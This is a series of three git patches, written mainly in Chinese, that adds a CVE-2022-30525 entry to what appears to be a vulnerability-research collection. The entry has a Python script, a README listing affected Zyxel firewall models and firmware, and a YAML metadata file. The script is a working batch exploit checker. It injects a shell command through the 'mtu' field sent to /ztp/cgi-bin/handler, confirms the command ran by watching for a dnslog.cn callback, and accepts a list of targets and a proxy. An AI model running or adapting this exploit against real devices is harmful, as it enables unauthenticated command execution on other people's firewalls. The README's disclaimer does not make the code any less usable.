From 741c8ac531144b75de151ca21a13e752ae401ec3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?=
 <moon-sun@yuelianghetaiyangdeMacBook-Pro.local>
Date: Thu, 6 Apr 2023 09:24:49 +0800
Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-30525?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2022/CVE-2022-30525/CVE-2022-30525.yaml   | 116 ++++++++++++++++++
 cve/Zyxel/2022/CVE-2022-30525/README.md       |  32 +++++
 cve/Zyxel/yaml/CVE-2022-30525.yaml            |  21 ++++
 other_list.yaml                               |   2 +
 4 files changed, 171 insertions(+)
 create mode 100644 cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml
 create mode 100644 cve/Zyxel/2022/CVE-2022-30525/README.md
 create mode 100644 cve/Zyxel/yaml/CVE-2022-30525.yaml

diff --git a/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml
new file mode 100644
index 00000000..3d181373
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml
@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+# -*- conding:utf-8 -*-
+import requests
+import argparse
+import sys
+import urllib3
+import json
+import time
+import random
+import signal
+
+dnslog_res = requests.session()
+urllib3.disable_warnings()
+
+__desc__ = 'CVE-2022-30525利用dnslog批量验证'
+__author__ = 'savior'
+__date__ = '2022/05/14'
+__version__ = 'v0.1'
+__link__ = 'https://github.com/savior-only/CVE-2022-30525'
+
+
+def banner():
+    print("""
+   ██████  ██      ██ ████████        ████   ████   ████   ████         ████   ████  ██████  ████  ██████
+  ██░░░░██░██     ░██░██░░░░░        █░░░ █ █░░░██ █░░░ █ █░░░ █       █░░░ █ █░░░██░█░░░░  █░░░ █░█░░░░ 
+ ██    ░░ ░██     ░██░██            ░    ░█░█  █░█░    ░█░    ░█      ░    ░█░█  █░█░█████ ░    ░█░█████ 
+░██       ░░██    ██ ░███████  █████   ███ ░█ █ ░█   ███    ███  █████   ███ ░█ █ ░█░░░░░ █   ███ ░░░░░ █
+░██        ░░██  ██  ░██░░░░  ░░░░░   █░░  ░██  ░█  █░░    █░░  ░░░░░   ░░░ █░██  ░█     ░█  █░░       ░█
+░░██    ██  ░░████   ░██             █     ░█   ░█ █      █            █   ░█░█   ░█ █   ░█ █      █   ░█
+ ░░██████    ░░██    ░████████      ░██████░ ████ ░██████░██████      ░ ████ ░ ████ ░ ████ ░██████░ ████ 
+  ░░░░░░      ░░     ░░░░░░░░       ░░░░░░  ░░░░  ░░░░░░ ░░░░░░        ░░░░   ░░░░   ░░░░  ░░░░░░  ░░░░  
+
+
+                                                                                by {} {}
+                                                                    {}
+               """.format(__author__, __version__, __link__))
+
+
+class Dnslog:
+
+    def get_dnslog():
+        t = random.random()
+        url = f"http://www.dnslog.cn/getdomain.php?t={t}"
+        res1 = dnslog_res.get(url=url, proxies=proxies)
+        if res1.status_code == 200 and "dnslog" in res1.text:
+            dnslog = res1.text
+            return dnslog
+        else:
+            print("获取dnslog失败")
+
+
+    def get_data():
+        t = random.random()
+        url = f"http://www.dnslog.cn/getrecords.php?t={t}"
+        res2 = dnslog_res.get(url=url, proxies=proxies)
+        return res2.text
+
+class information(object):
+
+    def __init__(self,args):
+        self.args = args
+        self.url = args.url
+        self.file = args.file
+
+    def target_url(self):
+        target_url = self.url + "/ztp/cgi-bin/handler"
+        headers = {
+            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
+            "Content-Type": "application/json"
+        }
+        dnslog = Dnslog.get_dnslog()
+        data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
+        try:
+            res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5)
+        except Exception as e:
+            pass
+
+        time.sleep(5)
+        data = Dnslog.get_data()
+        if dnslog in data:
+            print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
+            print("[" + "-"*100 + "]")
+        else:
+            print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入！")
+            print("[" + "-"*100 + "]")
+
+    def file_url(self):
+        with open(self.file, "r") as urls:
+            for url in urls:
+                url = url.strip()
+                if url[:4] != "http":
+                    url = "http://" + url
+                self.url = url.strip()
+                information.target_url(self)
+
+
+if __name__ == "__main__":
+    try:
+        banner()
+        parser = argparse.ArgumentParser(description='Zyxel 防火墙未经身份验证的远程命令注入', add_help=False)
+        parser.add_argument("-h", "--help", action="help", help="Show this help message and exit")
+        parser.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"")
+        parser.add_argument("-f", "--file", dest="file", help="Targets in file  eg:\"url.txt\"")
+        parser.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
+        args = parser.parse_args()
+        if args.proxy:
+            proxies = {"http": args.proxy, "https": args.proxy}
+            print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy))
+        if args.url:
+            information(args).target_url()
+        elif args.file:
+            information(args).file_url()
+    #检测ctrl+c
+    except KeyboardInterrupt:
+        print("\n\033[31mYou choose to stop me.\033[0m")
+
diff --git a/cve/Zyxel/2022/CVE-2022-30525/README.md b/cve/Zyxel/2022/CVE-2022-30525/README.md
new file mode 100644
index 00000000..e811e51e
--- /dev/null
+++ b/cve/Zyxel/2022/CVE-2022-30525/README.md
@@ -0,0 +1,32 @@
+# CVE-2022-30525
+Zyxel 防火墙未经身份验证的远程命令注入
+
+## 影响版本
+
+### 影响组件
+
+USG FLEX 100, 100W, 200, 500, 700
+USG20-VPN, USG20W-VPN
+ATP 100, 200, 500, 700, 800
+
+### 固件版本
+
+ZLD5.00 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+ZLD5.10 thru ZLD5.21 Patch 1
+
+## update
+
+-proxy
+
+
+
+## From
+https://github.com/Henry4E36/CVE-2022-30525
+
+
+# ⚠️ 免责声明
+
+此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！ 如果使用者使用该工具出现非法攻击等违法行为，与本作者无关！
+
+
diff --git a/cve/Zyxel/yaml/CVE-2022-30525.yaml b/cve/Zyxel/yaml/CVE-2022-30525.yaml
new file mode 100644
index 00000000..0f01d728
--- /dev/null
+++ b/cve/Zyxel/yaml/CVE-2022-30525.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-30525
+source: https://github.com/savior-only/CVE-2022-30525
+info:
+  name: Zyxel 防火墙未经身份验证的远程命令注入。
+  severity: critical
+  description:
+    A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+  scope-of-influence:
+    firmware versions 5.00 ~ 5.21
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2022-30525
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30525
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-30525
+    cwe-id: CWE-78
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022, Vendor Advisory, VDB Entry, firmware
+
diff --git a/other_list.yaml b/other_list.yaml
index 363ec2fb..fc7663c8 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -43,4 +43,6 @@ cve:
     - CVE-2021-21315
   zabbix:
     - CVE-2022-23131
+  Zyxel:
+    - CVE-2022-30525
 cnvd:
-- 
Gitee


From 6e256bd2a49b374f98f066262556301e9da9a09a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?=
 <moon-sun@yuelianghetaiyangdeMacBook-Pro.local>
Date: Thu, 6 Apr 2023 14:46:10 +0800
Subject: [PATCH 2/3] =?UTF-8?q?=E4=BF=AE=E6=94=B9yaml=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=BD=8D=E7=BD=AE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/Zyxel/{ => 2022}/yaml/CVE-2022-30525.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/Zyxel/{ => 2022}/yaml/CVE-2022-30525.yaml (100%)

diff --git a/cve/Zyxel/yaml/CVE-2022-30525.yaml b/cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
similarity index 100%
rename from cve/Zyxel/yaml/CVE-2022-30525.yaml
rename to cve/Zyxel/2022/yaml/CVE-2022-30525.yaml
-- 
Gitee


From f42851dbb8478d335cee2abe526bbfcd87ab765a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9C=88=E4=BA=AE=E5=92=8C=E5=A4=AA=E9=98=B3?=
 <moon-sun@yuelianghetaiyangdeMacBook-Pro.local>
Date: Thu, 6 Apr 2023 15:05:24 +0800
Subject: [PATCH 3/3] rename filename

---
 .../CVE-2022-30525/{CVE-2022-30525.yaml => CVE-2022-30525.py}     | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/Zyxel/2022/CVE-2022-30525/{CVE-2022-30525.yaml => CVE-2022-30525.py} (100%)

diff --git a/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml b/cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.py
similarity index 100%
rename from cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.yaml
rename to cve/Zyxel/2022/CVE-2022-30525/CVE-2022-30525.py
-- 
Gitee